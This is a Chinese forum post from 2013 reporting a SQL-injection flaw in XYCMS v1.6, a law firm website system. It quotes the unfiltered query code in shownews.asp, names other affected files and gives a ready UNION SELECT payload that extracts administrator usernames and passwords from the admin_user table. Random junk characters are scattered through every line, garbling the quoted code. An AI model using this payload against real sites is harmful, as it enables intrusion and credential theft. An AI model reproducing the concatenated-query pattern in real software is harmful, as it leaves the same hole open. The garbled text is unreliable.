前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
- ?) X* v, \. V+ \! J1 h / V4 P$ l* i7 ?/ ~) I6 X
淫荡分割线
* z6 F" E W G--------------------------------------------------------
' G* v% K, z! r" N$ l ( z# t& Z7 U; S* A3 m
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)- f" U4 D' m6 X. I9 p6 ]
源码地址:http://down.chinaz.com/soft/29233.htm2 _' c( J5 _3 S5 G" D- y3 I
( f1 Z7 v( D0 p f; ]漏洞文件:shownews.asp
8 C/ B2 S* j; R$ A- M: X漏洞代码:7-13行
; k- i0 y8 D$ j/ a0 z4 Z4 |3 B 8 [+ t' H4 y. }: {- x" o4 g: F+ y
( [5 D; k8 F2 `- [6 g2 ^
<%
2 b# F9 [. D, k4 \3 o* E" M: tid=request.QueryString("id")+ T- \0 c6 U, v q
; R* T+ [8 t7 x* ]) T3 F+ l
set snews=server.createobject("adodb.recordset") A0 [7 z$ D2 Q9 D( D; K: R. x0 v. [
exec="select * from [news] where id="&id
( h0 _$ j. h2 B- `2 l- o9 X* e6 asnews.open exec,conn,1,17 M: `0 @% F& Q6 t# i; {. N' L, k
%>( n E( [* ?" M/ X, b8 b! T' D, k
0 i- ~# m+ W Q' K
+ e4 d2 `3 I: j! ?什么过滤都没有 直造成注入
3 }. r2 F4 d0 X' z0 Y
+ D8 c9 N o" \8 L4 M注入点:http://127.0.0.1:99/shownews.asp?id=xx
& g. _- B0 Z5 v/ A; C
' S+ H" u' G, }) k4 @其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找' v3 o2 e6 R# e) j' B
% F# {9 N( g/ X9 D ' a a7 z& Q; D/ O/ L
exp: union select 1,admin,password,4,5,7 from admin_user
2 d" l u2 h; E1 y" d- D: s
2 x7 t& ~# t8 r7 b- a; w6 d5 m1 z |
发表于 2013-4-4 17:28:12
收藏
支持
反对